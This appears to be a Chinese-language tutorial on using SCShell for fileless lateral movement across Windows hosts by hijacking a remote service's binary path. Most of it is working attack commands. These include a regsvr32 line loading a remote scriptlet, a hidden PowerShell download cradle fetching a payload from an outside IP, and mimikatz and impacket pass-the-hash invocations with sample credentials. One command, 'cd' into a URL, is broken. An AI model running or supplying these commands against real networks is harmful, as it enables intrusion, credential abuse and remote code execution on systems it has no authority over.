横向无文件移动--SCshell使用

1、简介

SCShell是无文件横向移动工具，它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务，而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可（所以要事先知道目标上的服务名称）。支持py和exe两种文件类型。

2、使用

Windows 使用

    SCShell.exe target service payload domain username password
    SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password # XblAuthManager 是 Xbox Accessory Management Service的服务名

测试写入文件

scshell.exe 192.168.152.148 defragsvc "C:\windows\system32\cmd.exe /c echo ' hello' > c:\windows\temp\hello.txt" . administrator admin@123

CSshell横向利用powershell上线

scshell.exe 192.168.152.148 defragsvc "C:\windows\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://182.1.1.156:8000/a')" . administrator admin@123

可以使用该C程序传递哈希值。
有时情况下，将使用当前进程令牌。您可以使用标准传递哈希方法设置当前流程令牌。

在本地系统上

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe

然后在新创建的cmd.exe中运行SCShell.exe进行横向。
上面我们使用的是XblAuthManager，其实我们还可以使用defragsvc，msbuild等等

2. Linux 安装使用

    pip install impacket
    git clone https://github.com/Mr-Un1k0d3r/SCShell
    cd https://github.com/Mr-Un1k0d3r/SCShell
    python scshell.py ./administrator:cxzcxz@192.168.52.133 # 执行cmd模式，没有命令回显
    python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce # hash验证

3、日志痕迹

使用用户凭证连接会在目标日志系统留下用户名、来访机器IP和服务超时等信息